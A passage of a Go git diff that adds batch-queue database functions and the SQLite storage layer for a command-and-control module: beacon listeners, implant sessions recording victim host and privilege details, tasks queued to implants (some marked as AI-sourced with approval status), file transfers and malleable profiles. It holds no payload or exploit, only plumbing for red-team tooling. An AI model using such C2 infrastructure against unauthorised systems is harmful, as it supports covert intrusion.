nil { + return fmt.Errorf("更新批量任务调度配置失败: %w", err) + } + return nil +} + +// UpdateBatchQueueScheduleEnabled 是否允许 Cron 自动触发(手工「开始执行」不受影响) +func (db *DB) UpdateBatchQueueScheduleEnabled(queueID string, enabled bool) error { + v := 0 + if enabled { + v = 1 + } + _, err := db.Exec( + "UPDATE batch_task_queues SET schedule_enabled = ? WHERE id = ?", + v, queueID, + ) + if err != nil { + return fmt.Errorf("更新批量任务调度开关失败: %w", err) + } + return nil +} + +// RecordBatchQueueScheduledTriggerStart 记录一次由调度触发的开始时间并清空调度层错误 +func (db *DB) RecordBatchQueueScheduledTriggerStart(queueID string, at time.Time) error { + _, err := db.Exec( + "UPDATE batch_task_queues SET last_schedule_trigger_at = ?, last_schedule_error = NULL WHERE id = ?", + at, queueID, + ) + if err != nil { + return fmt.Errorf("记录调度触发时间失败: %w", err) + } + return nil +} + +// SetBatchQueueLastScheduleError 调度启动失败等原因(如状态不允许、重置失败) +func (db *DB) SetBatchQueueLastScheduleError(queueID, msg string) error { + _, err := db.Exec( + "UPDATE batch_task_queues SET last_schedule_error = ? WHERE id = ?", + msg, queueID, + ) + if err != nil { + return fmt.Errorf("写入调度错误信息失败: %w", err) + } + return nil +} + +// SetBatchQueueLastRunError 最近一轮执行中出现的子任务失败摘要(空串表示清空) +func (db *DB) SetBatchQueueLastRunError(queueID, msg string) error { + var v interface{} + if strings.TrimSpace(msg) == "" { + v = nil + } else { + v = msg + } + _, err := db.Exec( + "UPDATE batch_task_queues SET last_run_error = ? WHERE id = ?", + v, queueID, + ) + if err != nil { + return fmt.Errorf("写入最近运行错误失败: %w", err) + } + return nil +} + +// ResetBatchQueueForRerun 重置队列和任务状态用于下一轮调度执行 +func (db *DB) ResetBatchQueueForRerun(queueID string) error { + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开始事务失败: %w", err) + } + defer tx.Rollback() + + _, err = tx.Exec( + "UPDATE batch_task_queues SET status = ?, current_index = 0, started_at = NULL, completed_at = NULL, last_run_error = NULL, last_schedule_error = NULL WHERE id = ?", + "pending", queueID, + ) + if err != nil { + return fmt.Errorf("重置批量任务队列状态失败: %w", err) + } + + _, err = tx.Exec( + "UPDATE batch_tasks SET status = ?, conversation_id = NULL, started_at = NULL, completed_at = NULL, error = NULL, result = NULL WHERE queue_id = ?", + "pending", queueID, + ) + if err != nil { + return fmt.Errorf("重置批量任务状态失败: %w", err) + } + + return tx.Commit() +} + +// UpdateBatchTaskMessage 更新批量任务消息 +func (db *DB) UpdateBatchTaskMessage(queueID, taskID, message string) error { + _, err := db.Exec( + "UPDATE batch_tasks SET message = ? WHERE queue_id = ? AND id = ?", + message, queueID, taskID, + ) + if err != nil { + return fmt.Errorf("更新批量任务消息失败: %w", err) + } + return nil +} + +// AddBatchTask 添加任务到批量任务队列 +func (db *DB) AddBatchTask(queueID, taskID, message string) error { + _, err := db.Exec( + "INSERT INTO batch_tasks (id, queue_id, message, status) VALUES (?, ?, ?, ?)", + taskID, queueID, message, "pending", + ) + if err != nil { + return fmt.Errorf("添加批量任务失败: %w", err) + } + return nil +} + +// CancelPendingBatchTasks 批量取消队列中所有 pending 状态的任务(单条 SQL) +func (db *DB) CancelPendingBatchTasks(queueID string, completedAt time.Time) error { + _, err := db.Exec( + "UPDATE batch_tasks SET status = ?, completed_at = ? WHERE queue_id = ? AND status = ?", + "cancelled", completedAt, queueID, "pending", + ) + if err != nil { + return fmt.Errorf("批量取消 pending 任务失败: %w", err) + } + return nil +} + +// PrepareBatchSingleTaskRun 准备单条执行:可选重置子任务,并更新队列索引与状态 +func (db *DB) PrepareBatchSingleTaskRun(queueID, taskID string, taskIndex int, resetTask, resumeQueue bool) error { + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开始事务失败: %w", err) + } + defer tx.Rollback() + + if resetTask { + _, err = tx.Exec( + "UPDATE batch_tasks SET status = ?, conversation_id = NULL, started_at = NULL, completed_at = NULL, error = NULL, result = NULL WHERE queue_id = ? AND id = ?", + "pending", queueID, taskID, + ) + if err != nil { + return fmt.Errorf("重置批量任务状态失败: %w", err) + } + } + + if resumeQueue { + _, err = tx.Exec( + "UPDATE batch_task_queues SET status = ?, current_index = ?, completed_at = NULL, last_run_error = NULL WHERE id = ?", + "paused", taskIndex, queueID, + ) + } else { + _, err = tx.Exec( + "UPDATE batch_task_queues SET current_index = ?, last_run_error = NULL WHERE id = ?", + taskIndex, queueID, + ) + } + if err != nil { + return fmt.Errorf("更新批量任务队列状态失败: %w", err) + } + + return tx.Commit() +} + +// DeleteBatchTask 删除批量任务 +func (db *DB) DeleteBatchTask(queueID, taskID string) error { + _, err := db.Exec( + "DELETE FROM batch_tasks WHERE queue_id = ? AND id = ?", + queueID, taskID, + ) + if err != nil { + return fmt.Errorf("删除批量任务失败: %w", err) + } + return nil +} + +// DeleteBatchQueue 删除批量任务队列 +func (db *DB) DeleteBatchQueue(queueID string) error { + tx, err := db.Begin() + if err != nil { + return fmt.Errorf("开始事务失败: %w", err) + } + defer tx.Rollback() + + // 删除任务(外键会自动级联删除) + _, err = tx.Exec("DELETE FROM batch_tasks WHERE queue_id = ?", queueID) + if err != nil { + return fmt.Errorf("删除批量任务失败: %w", err) + } + + // 删除队列 + _, err = tx.Exec("DELETE FROM batch_task_queues WHERE id = ?", queueID) + if err != nil { + return fmt.Errorf("删除批量任务队列失败: %w", err) + } + + return tx.Commit() +} diff --git a/internal/database/c2.go b/internal/database/c2.go new file mode 100644 index 00000000..fee5184f --- /dev/null +++ b/internal/database/c2.go @@ -0,0 +1,1948 @@ +package database + +import ( + "database/sql" + "encoding/json" + "errors" + "fmt" + "strings" + "time" + + "go.uber.org/zap" +) + +// ErrNoValidC2EventIDs 批量删除事件时未提供任何合法 ID +var ErrNoValidC2EventIDs = errors.New("no valid event ids") + +// ErrNoValidC2TaskIDs 批量删除任务时未提供任何合法 ID +var ErrNoValidC2TaskIDs = errors.New("no valid task ids") + +// ErrNoValidC2SessionIDs 批量删除会话时未提供任何合法 ID +var ErrNoValidC2SessionIDs = errors.New("no valid session ids") + +// validC2TextIDForDelete 校验 C2 文本主键(e_/t_/s_/… 等)用于批量删除入参 +func validC2TextIDForDelete(id string) bool { + if len(id) < 2 || len(id) > 80 { + return false + } + for _, c := range id { + if (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') || (c >= '0' && c <= '9') || c == '_' { + continue + } + return false + } + return true +} + +// ============================================================================ +// C2 模块数据模型 — 6 张表的领域类型 +// 设计要点: +// - 全部使用文本主键(l_/s_/t_/f_/e_/p_ 前缀),与项目现有 ws_/v_ 风格一致; +// - 时间字段统一 time.Time,由 SQLite 自动序列化为 ISO8601; +// - 大字段(profile 配置、心跳元数据、任务结果)走 JSON 文本,避免频繁加列; +// - 任意会话/任务/文件均可按 listener_id / session_id 级联删除(FOREIGN KEY ON DELETE CASCADE)。 +// ============================================================================ + +// C2Listener 监听器实体 +type C2Listener struct { + ID string `json:"id"` + ProjectID string `json:"project_id,omitempty"` + Name string `json:"name"` + Type string `json:"type"` // tcp_reverse|http_beacon|https_beacon|websocket|dns + BindHost string `json:"bindHost"` // 默认 127.0.0.1 + BindPort int `json:"bindPort"` // 1-65535 + ProfileID string `json:"profileId"` // 可空:关联 c2_profiles.id + EncryptionKey string `json:"-"` // base64(AES-256),前端不返回 + ImplantToken string `json:"-"` // beacon 携带的鉴权 token,前端不返回 + Status string `json:"status"` // stopped|running|error + ConfigJSON string `json:"configJson"` // TLS 证书路径 / URI 模式 / 上限并发 等 + Remark string `json:"remark"` + OwnerUserID string `json:"ownerUserId,omitempty"` + CreatedAt time.Time `json:"createdAt"` + StartedAt *time.Time `json:"startedAt,omitempty"` + LastError string `json:"lastError,omitempty"` +} + +// C2Session 已上线会话 +type C2Session struct { + ID string `json:"id"` + ListenerID string `json:"listenerId"` + ImplantUUID string `json:"implantUuid"` + Hostname string `json:"hostname"` + Username string `json:"username"` + OS string `json:"os"` + Arch string `json:"arch"` + PID int `json:"pid"` + ProcessName string `json:"processName"` + IsAdmin bool `json:"isAdmin"` + InternalIP string `json:"internalIp"` + ExternalIP string `json:"externalIp"` + UserAgent string `json:"userAgent"` + SleepSeconds int `json:"sleepSeconds"` + JitterPercent int `json:"jitterPercent"` + Status string `json:"status"` // active|sleeping|dead|killed + FirstSeenAt time.Time `json:"firstSeenAt"` + LastCheckIn time.Time `json:"lastCheckIn"` + Metadata map[string]interface{} `json:"metadata,omitempty"` + Note string `json:"note"` +} + +// C2Task 下发任务 +type C2Task struct { + ID string `json:"id"` + SessionID string `json:"sessionId"` + TaskType string `json:"taskType"` + Payload map[string]interface{} `json:"payload,omitempty"` + Status string `json:"status"` // queued|sent|running|success|failed|cancelled + ResultText string `json:"resultText,omitempty"` + ResultBlobPath string `json:"resultBlobPath,omitempty"` + Error string `json:"error,omitempty"` + Source string `json:"source"` // manual|ai|batch|api + ConversationID string `json:"conversationId,omitempty"` + ApprovalStatus string `json:"approvalStatus,omitempty"` // pending|approved|rejected + CreatedAt time.Time `json:"createdAt"` + SentAt *time.Time `json:"sentAt,omitempty"` + StartedAt *time.Time `json:"startedAt,omitempty"` + CompletedAt *time.Time `json:"completedAt,omitempty"` + DurationMS int64 `json:"durationMs,omitempty"` +} + +// C2File 上传/下载凭证 +type C2File struct { + ID string `json:"id"` + SessionID string `json:"sessionId"` + TaskID string `json:"taskId"` + Direction string `json:"direction"` // upload|download + RemotePath string `json:"remotePath"` + LocalPath string `json:"localPath"` + SizeBytes int64 `json:"sizeBytes"` + SHA256 string `json:"sha256"` + CreatedAt time.Time `json:"createdAt"` +} + +// C2Event 事件审计 +type C2Event struct { + ID string `json:"id"` + Level string `json:"level"` // info|warn|critical + Category string `json:"category"` // listener|session|task|payload|opsec + SessionID string `json:"sessionId,omitempty"` + TaskID string `json:"taskId,omitempty"` + Message string `json:"message"` + Data map[string]interface{} `json:"data,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// C2Profile Malleable Profile +type C2Profile struct { + ID string `json:"id"` + Name string `json:"name"` + UserAgent string `json:"userAgent"` + URIs []string `json:"uris"` + RequestHeaders map[string]string `json:"requestHeaders,omitempty"` + ResponseHeaders map[string]string `json:"responseHeaders,omitempty"` + BodyTemplate string `json:"bodyTemplate"` + JitterMinMS int `json:"jitterMinMs"` + JitterMaxMS int `json:"jitterMaxMs"` + Extra map[string]interface{} `json:"extra,omitempty"` + CreatedAt time.Time `json:"createdAt"` +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 监听器 +// ---------------------------------------------------------------------------- + +// CreateC2Listener 写入新监听器;ID/Name 由调用方生成校验 +func (db *DB) CreateC2Listener(l *C2Listener) error { + if l == nil || strings.TrimSpace(l.ID) == "" { + return errors.New("listener id is required") + } + if l.CreatedAt.IsZero() { + l.CreatedAt = time.Now() + } + if strings.TrimSpace(l.Status) == "" { + l.Status = "stopped" + } + if strings.TrimSpace(l.ConfigJSON) == "" { + l.ConfigJSON = "{}" + } + query := ` + INSERT INTO c2_listeners (id, project_id, name, type, bind_host, bind_port, profile_id, encryption_key, + implant_token, status, config_json, remark, owner_user_id, created_at, started_at, last_error) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ` + _, err := db.Exec(query, + l.ID, strings.TrimSpace(l.ProjectID), l.Name, l.Type, l.BindHost, l.BindPort, l.ProfileID, l.EncryptionKey, + l.ImplantToken, l.Status, l.ConfigJSON, l.Remark, l.OwnerUserID, l.CreatedAt, l.StartedAt, l.LastError, + ) + if err != nil { + db.logger.Error("创建 C2 监听器失败", zap.Error(err), zap.String("id", l.ID)) + return err + } + return nil +} + +// UpdateC2Listener 更新监听器;空字段也会被覆盖(请先 GetC2Listener 拿到完整对象再改) +func (db *DB) UpdateC2Listener(l *C2Listener) error { + if l == nil || strings.TrimSpace(l.ID) == "" { + return errors.New("listener id is required") + } + if strings.TrimSpace(l.ConfigJSON) == "" { + l.ConfigJSON = "{}" + } + query := ` + UPDATE c2_listeners SET + project_id = ?, name = ?, type = ?, bind_host = ?, bind_port = ?, profile_id = ?, encryption_key = ?, + implant_token = ?, status = ?, config_json = ?, remark = ?, owner_user_id = ?, started_at = ?, last_error = ? + WHERE id = ? + ` + res, err := db.Exec(query, + strings.TrimSpace(l.ProjectID), l.Name, l.Type, l.BindHost, l.BindPort, l.ProfileID, l.EncryptionKey, + l.ImplantToken, l.Status, l.ConfigJSON, l.Remark, l.OwnerUserID, l.StartedAt, l.LastError, l.ID, + ) + if err != nil { + db.logger.Error("更新 C2 监听器失败", zap.Error(err), zap.String("id", l.ID)) + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2ListenerStatus 仅更新状态/started_at/last_error 三个字段,避免与全量更新竞争 +func (db *DB) SetC2ListenerStatus(id, status, lastError string, startedAt *time.Time) error { + query := ` + UPDATE c2_listeners SET status = ?, last_error = ?, started_at = COALESCE(?, started_at) + WHERE id = ? + ` + res, err := db.Exec(query, status, lastError, startedAt, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// GetC2Listener 单条查询 +func (db *DB) GetC2Listener(id string) (*C2Listener, error) { + query := ` + SELECT id, COALESCE(project_id, ''), name, type, bind_host, bind_port, COALESCE(profile_id, ''), + COALESCE(encryption_key, ''), COALESCE(implant_token, ''), status, + COALESCE(config_json, '{}'), COALESCE(remark, ''), + COALESCE(owner_user_id, ''), created_at, started_at, COALESCE(last_error, '') + FROM c2_listeners WHERE id = ? + ` + var l C2Listener + var startedAt sql.NullTime + err := db.QueryRow(query, id).Scan( + &l.ID, &l.ProjectID, &l.Name, &l.Type, &l.BindHost, &l.BindPort, &l.ProfileID, + &l.EncryptionKey, &l.ImplantToken, &l.Status, + &l.ConfigJSON, &l.Remark, + &l.OwnerUserID, &l.CreatedAt, &startedAt, &l.LastError, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + if startedAt.Valid { + t := startedAt.Time + l.StartedAt = &t + } + return &l, nil +} + +// ListC2Listeners 全量列表,按创建时间倒序 +func (db *DB) ListC2Listeners() ([]*C2Listener, error) { + query := ` + SELECT id, COALESCE(project_id, ''), name, type, bind_host, bind_port, COALESCE(profile_id, ''), + COALESCE(encryption_key, ''), COALESCE(implant_token, ''), status, + COALESCE(config_json, '{}'), COALESCE(remark, ''), + COALESCE(owner_user_id, ''), created_at, started_at, COALESCE(last_error, '') + FROM c2_listeners ORDER BY created_at DESC + ` + rows, err := db.Query(query) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Listener + for rows.Next() { + var l C2Listener + var startedAt sql.NullTime + if err := rows.Scan( + &l.ID, &l.ProjectID, &l.Name, &l.Type, &l.BindHost, &l.BindPort, &l.ProfileID, + &l.EncryptionKey, &l.ImplantToken, &l.Status, + &l.ConfigJSON, &l.Remark, + &l.OwnerUserID, &l.CreatedAt, &startedAt, &l.LastError, + ); err != nil { + db.logger.Warn("扫描 c2_listeners 行失败", zap.Error(err)) + continue + } + if startedAt.Valid { + t := startedAt.Time + l.StartedAt = &t + } + list = append(list, &l) + } + return list, rows.Err() +} + +// ListC2ListenersForAccess lists listeners visible to the resolved RBAC scope. +func (db *DB) ListC2ListenersForAccess(access RBACListAccess, projectID string) ([]*C2Listener, error) { + conditions := []string{"1=1"} + args := []interface{}{} + if projectID = strings.TrimSpace(projectID); projectID == ProjectFilterUnbound { + conditions = append(conditions, "COALESCE(project_id, '') = ''") + } else if projectID != "" { + conditions = append(conditions, "COALESCE(project_id, '') = ?") + args = append(args, projectID) + } + appendC2ListenerAccessFilter(&conditions, &args, access) + query := ` + SELECT id, COALESCE(project_id, ''), name, type, bind_host, bind_port, COALESCE(profile_id, ''), + COALESCE(encryption_key, ''), COALESCE(implant_token, ''), status, + COALESCE(config_json, '{}'), COALESCE(remark, ''), + COALESCE(owner_user_id, ''), created_at, started_at, COALESCE(last_error, '') + FROM c2_listeners + WHERE ` + strings.Join(conditions, " AND ") + ` + ORDER BY created_at DESC + ` + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Listener + for rows.Next() { + var l C2Listener + var startedAt sql.NullTime + if err := rows.Scan( + &l.ID, &l.ProjectID, &l.Name, &l.Type, &l.BindHost, &l.BindPort, &l.ProfileID, + &l.EncryptionKey, &l.ImplantToken, &l.Status, + &l.ConfigJSON, &l.Remark, &l.OwnerUserID, + &l.CreatedAt, &startedAt, &l.LastError, + ); err != nil { + db.logger.Warn("扫描 c2_listeners 行失败", zap.Error(err)) + continue + } + if startedAt.Valid { + t := startedAt.Time + l.StartedAt = &t + } + list = append(list, &l) + } + return list, rows.Err() +} + +func appendC2ListenerAccessFilter(conditions *[]string, args *[]interface{}, access RBACListAccess) { + if access.Scope == RBACScopeAll { + return + } + if access.UserID == "" { + *conditions = append(*conditions, "1=0") + return + } + clauses := []string{"owner_user_id = ?"} + *args = append(*args, access.UserID) + if access.Scope == RBACScopeAssigned { + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND ra.resource_type = 'c2_listener' AND ra.resource_id = c2_listeners.id + )`) + *args = append(*args, access.UserID) + } + *conditions = append(*conditions, "("+strings.Join(clauses, " OR ")+")") +} + +// DeleteC2Listener 级联删除(会话/任务/文件/事件随之消失) +func (db *DB) DeleteC2Listener(id string) error { + res, err := db.Exec(`DELETE FROM c2_listeners WHERE id = ?`, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// ---------------------------------------------------------------------------- +// CRUD:C2 会话 +// ---------------------------------------------------------------------------- + +// UpsertC2Session 按 implant_uuid 唯一约束:首次插入 / 已存在则更新心跳和状态 +func (db *DB) UpsertC2Session(s *C2Session) error { + if s == nil || strings.TrimSpace(s.ID) == "" || strings.TrimSpace(s.ImplantUUID) == "" { + return errors.New("session id and implant_uuid are required") + } + if s.FirstSeenAt.IsZero() { + s.FirstSeenAt = time.Now() + } + if s.LastCheckIn.IsZero() { + s.LastCheckIn = s.FirstSeenAt + } + if strings.TrimSpace(s.Status) == "" { + s.Status = "active" + } + metadataJSON := "{}" + if len(s.Metadata) > 0 { + if b, err := json.Marshal(s.Metadata); err == nil { + metadataJSON = string(b) + } + } + query := ` + INSERT INTO c2_sessions (id, listener_id, implant_uuid, hostname, username, os, arch, + pid, process_name, is_admin, internal_ip, external_ip, user_agent, + sleep_seconds, jitter_percent, status, first_seen_at, last_check_in, + metadata_json, note) + VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) + ON CONFLICT(implant_uuid) DO UPDATE SET + hostname = excluded.hostname, + username = excluded.username, + os = excluded.os, + arch = excluded.arch, + pid = excluded.pid, + process_name = excluded.process_name, + is_admin = excluded.is_admin, + internal_ip = excluded.internal_ip, + external_ip = excluded.external_ip, + user_agent = excluded.user_agent, + sleep_seconds = excluded.sleep_seconds, + jitter_percent = excluded.jitter_percent, + status = excluded.status, + last_check_in = excluded.last_check_in, + metadata_json = excluded.metadata_json + ` + isAdminInt := 0 + if s.IsAdmin { + isAdminInt = 1 + } + _, err := db.Exec(query, + s.ID, s.ListenerID, s.ImplantUUID, s.Hostname, s.Username, s.OS, s.Arch, + s.PID, s.ProcessName, isAdminInt, s.InternalIP, s.ExternalIP, s.UserAgent, + s.SleepSeconds, s.JitterPercent, s.Status, s.FirstSeenAt, s.LastCheckIn, + metadataJSON, s.Note, + ) + if err != nil { + db.logger.Error("upsert C2 会话失败", zap.Error(err), zap.String("implant_uuid", s.ImplantUUID)) + return err + } + return nil +} + +// TouchC2Session 仅更新 last_check_in / status,性能比 UpsertC2Session 高,给 beacon 高频心跳用 +func (db *DB) TouchC2Session(id, status string, t time.Time) error { + if t.IsZero() { + t = time.Now() + } + res, err := db.Exec(`UPDATE c2_sessions SET last_check_in = ?, status = ? WHERE id = ?`, t, status, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionStatus 单独改状态 +func (db *DB) SetC2SessionStatus(id, status string) error { + res, err := db.Exec(`UPDATE c2_sessions SET status = ? WHERE id = ?`, status, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionSleep 改 sleep / jitter(操作员或 AI 主动调整心跳节律) +func (db *DB) SetC2SessionSleep(id string, sleepSeconds, jitterPercent int) error { + if sleepSeconds < 0 { + sleepSeconds = 0 + } + if jitterPercent < 0 { + jitterPercent = 0 + } + if jitterPercent > 100 { + jitterPercent = 100 + } + res, err := db.Exec(`UPDATE c2_sessions SET sleep_seconds = ?, jitter_percent = ? WHERE id = ?`, + sleepSeconds, jitterPercent, id) + if err != nil { + return err + } + affected, _ := res.RowsAffected() + if affected == 0 { + return sql.ErrNoRows + } + return nil +} + +// SetC2SessionNote 改备注 +func (db *DB) SetC2SessionNote(id, note string) error { + _, err := db.Exec(`UPDATE c2_sessions SET note = ? WHERE id = ?`, note, id) + return err +} + +// GetC2Session 按内部 ID 查 +func (db *DB) GetC2Session(id string) (*C2Session, error) { + return db.queryC2SessionWhere(`id = ?`, id) +} + +// GetC2SessionByImplantUUID 按 implant 自报的 UUID 查(重连必需) +func (db *DB) GetC2SessionByImplantUUID(uuid string) (*C2Session, error) { + return db.queryC2SessionWhere(`implant_uuid = ?`, uuid) +} + +func (db *DB) queryC2SessionWhere(whereClause string, args ...interface{}) (*C2Session, error) { + query := ` + SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), + COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), + COALESCE(is_admin, 0), COALESCE(internal_ip,''), COALESCE(external_ip,''), + COALESCE(user_agent,''), COALESCE(sleep_seconds, 5), COALESCE(jitter_percent, 0), + status, first_seen_at, last_check_in, COALESCE(metadata_json, '{}'), + COALESCE(note, '') + FROM c2_sessions WHERE ` + whereClause + row := db.QueryRow(query, args...) + var s C2Session + var isAdminInt int + var metadataJSON string + err := row.Scan( + &s.ID, &s.ListenerID, &s.ImplantUUID, &s.Hostname, &s.Username, + &s.OS, &s.Arch, &s.PID, &s.ProcessName, + &isAdminInt, &s.InternalIP, &s.ExternalIP, + &s.UserAgent, &s.SleepSeconds, &s.JitterPercent, + &s.Status, &s.FirstSeenAt, &s.LastCheckIn, &metadataJSON, + &s.Note, + ) + if err == sql.ErrNoRows { + return nil, nil + } + if err != nil { + return nil, err + } + s.IsAdmin = isAdminInt != 0 + if metadataJSON != "" && metadataJSON != "{}" { + _ = json.Unmarshal([]byte(metadataJSON), &s.Metadata) + } + return &s, nil +} + +// ListC2SessionsFilter 列表过滤参数 +type ListC2SessionsFilter struct { + ListenerID string + ProjectID string + Status string // active|sleeping|dead|killed;空表示全部 + OS string + Search string // 模糊匹配 hostname/username/internal_ip + Suspicious bool // 疑似误报:离线且 hostname 为 tcp_* / 用户名为 unknown / PID 为 0 + Limit int // 0 表示无限制 +} + +// ListC2Sessions 列表,按 last_check_in 倒序 +func (db *DB) ListC2Sessions(filter ListC2SessionsFilter) ([]*C2Session, error) { + conditions := []string{"1=1"} + args := []interface{}{} + if filter.ListenerID != "" { + conditions = append(conditions, "listener_id = ?") + args = append(args, filter.ListenerID) + } + if strings.TrimSpace(filter.ProjectID) == ProjectFilterUnbound { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE l.id = c2_sessions.listener_id AND COALESCE(l.project_id, '') = '' + )`) + } else if strings.TrimSpace(filter.ProjectID) != "" { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE l.id = c2_sessions.listener_id AND COALESCE(l.project_id, '') = ? + )`) + args = append(args, strings.TrimSpace(filter.ProjectID)) + } + if filter.Status != "" { + conditions = append(conditions, "status = ?") + args = append(args, filter.Status) + } + if filter.OS != "" { + conditions = append(conditions, "os = ?") + args = append(args, filter.OS) + } + if filter.Search != "" { + conditions = append(conditions, "(hostname LIKE ? OR username LIKE ? OR internal_ip LIKE ?)") + kw := "%" + filter.Search + "%" + args = append(args, kw, kw, kw) + } + if filter.Suspicious { + conditions = append(conditions, `status = 'dead' AND ( + hostname LIKE 'tcp_%' OR LOWER(COALESCE(username,'')) = 'unknown' OR COALESCE(pid, 0) = 0 + )`) + } + query := ` + SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), + COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), + COALESCE(is_admin, 0), COALESCE(internal_ip,''), COALESCE(external_ip,''), + COALESCE(user_agent,''), COALESCE(sleep_seconds, 5), COALESCE(jitter_percent, 0), + status, first_seen_at, last_check_in, COALESCE(metadata_json, '{}'), + COALESCE(note, '') + FROM c2_sessions + WHERE ` + strings.Join(conditions, " AND ") + ` + ORDER BY last_check_in DESC + ` + if filter.Limit > 0 { + query += fmt.Sprintf(" LIMIT %d", filter.Limit) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + var list []*C2Session + for rows.Next() { + var s C2Session + var isAdminInt int + var metadataJSON string + if err := rows.Scan( + &s.ID, &s.ListenerID, &s.ImplantUUID, &s.Hostname, &s.Username, + &s.OS, &s.Arch, &s.PID, &s.ProcessName, + &isAdminInt, &s.InternalIP, &s.ExternalIP, + &s.UserAgent, &s.SleepSeconds, &s.JitterPercent, + &s.Status, &s.FirstSeenAt, &s.LastCheckIn, &metadataJSON, + &s.Note, + ); err != nil { + db.logger.Warn("扫描 c2_sessions 行失败", zap.Error(err)) + continue + } + s.IsAdmin = isAdminInt != 0 + if metadataJSON != "" && metadataJSON != "{}" { + _ = json.Unmarshal([]byte(metadataJSON), &s.Metadata) + } + list = append(list, &s) + } + return list, rows.Err() +} + +// ListC2SessionsForAccess lists sessions whose parent listener is visible. +func (db *DB) ListC2SessionsForAccess(filter ListC2SessionsFilter, access RBACListAccess) ([]*C2Session, error) { + conditions, args := buildC2SessionsWhere(filter) + appendC2SessionAccessFilter(&conditions, &args, access) + query := ` + SELECT id, listener_id, implant_uuid, COALESCE(hostname,''), COALESCE(username,''), + COALESCE(os,''), COALESCE(arch,''), COALESCE(pid, 0), COALESCE(process_name,''), + COALESCE(is_admin, 0), COALESCE(internal_ip,''), COALESCE(external_ip,''), + COALESCE(user_agent,''), COALESCE(sleep_seconds, 5), COALESCE(jitter_percent, 0), + status, first_seen_at, last_check_in, COALESCE(metadata_json, '{}'), + COALESCE(note, '') + FROM c2_sessions + WHERE ` + strings.Join(conditions, " AND ") + ` + ORDER BY last_check_in DESC + ` + if filter.Limit > 0 { + query += fmt.Sprintf(" LIMIT %d", filter.Limit) + } + rows, err := db.Query(query, args...) + if err != nil { + return nil, err + } + defer rows.Close() + return db.scanC2SessionRows(rows) +} + +func buildC2SessionsWhere(filter ListC2SessionsFilter) ([]string, []interface{}) { + conditions := []string{"1=1"} + args := []interface{}{} + if filter.ListenerID != "" { + conditions = append(conditions, "listener_id = ?") + args = append(args, filter.ListenerID) + } + if strings.TrimSpace(filter.ProjectID) == ProjectFilterUnbound { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE l.id = c2_sessions.listener_id AND COALESCE(l.project_id, '') = '' + )`) + } else if strings.TrimSpace(filter.ProjectID) != "" { + conditions = append(conditions, `EXISTS ( + SELECT 1 FROM c2_listeners l + WHERE l.id = c2_sessions.listener_id AND COALESCE(l.project_id, '') = ? + )`) + args = append(args, strings.TrimSpace(filter.ProjectID)) + } + if filter.Status != "" { + conditions = append(conditions, "status = ?") + args = append(args, filter.Status) + } + if filter.OS != "" { + conditions = append(conditions, "os = ?") + args = append(args, filter.OS) + } + if filter.Search != "" { + conditions = append(conditions, "(hostname LIKE ? OR username LIKE ? OR internal_ip LIKE ?)") + kw := "%" + filter.Search + "%" + args = append(args, kw, kw, kw) + } + if filter.Suspicious { + conditions = append(conditions, `status = 'dead' AND ( + hostname LIKE 'tcp_%' OR LOWER(COALESCE(username,'')) = 'unknown' OR COALESCE(pid, 0) = 0 + )`) + } + return conditions, args +} + +func (db *DB) scanC2SessionRows(rows *sql.Rows) ([]*C2Session, error) { + var list []*C2Session + for rows.Next() { + var s C2Session + var isAdminInt int + var metadataJSON string + if err := rows.Scan( + &s.ID, &s.ListenerID, &s.ImplantUUID, &s.Hostname, &s.Username, + &s.OS, &s.Arch, &s.PID, &s.ProcessName, + &isAdminInt, &s.InternalIP, &s.ExternalIP, + &s.UserAgent, &s.SleepSeconds, &s.JitterPercent, + &s.Status, &s.FirstSeenAt, &s.LastCheckIn, &metadataJSON, + &s.Note, + ); err != nil { + db.logger.Warn("扫描 c2_sessions 行失败", zap.Error(err)) + continue + } + s.IsAdmin = isAdminInt != 0 + if metadataJSON != "" && metadataJSON != "{}" { + _ = json.Unmarshal([]byte(metadataJSON), &s.Metadata) + } + list = append(list, &s) + } + return list, rows.Err() +} + +func appendC2SessionAccessFilter(conditions *[]string, args *[]interface{}, access RBACListAccess) { + if access.Scope == RBACScopeAll { + return + } + if access.UserID == "" { + *conditions = append(*conditions, "1=0") + return + } + clauses := []string{`EXISTS ( + SELECT 1 FROM c2_listeners + WHERE c2_listeners.id = c2_sessions.listener_id AND c2_listeners.owner_user_id = ? + )`} + *args = append(*args, access.UserID) + if access.Scope == RBACScopeAssigned { + clauses = append(clauses, `EXISTS ( + SELECT 1 FROM rbac_resource_assignments ra + WHERE ra.user_id = ? AND 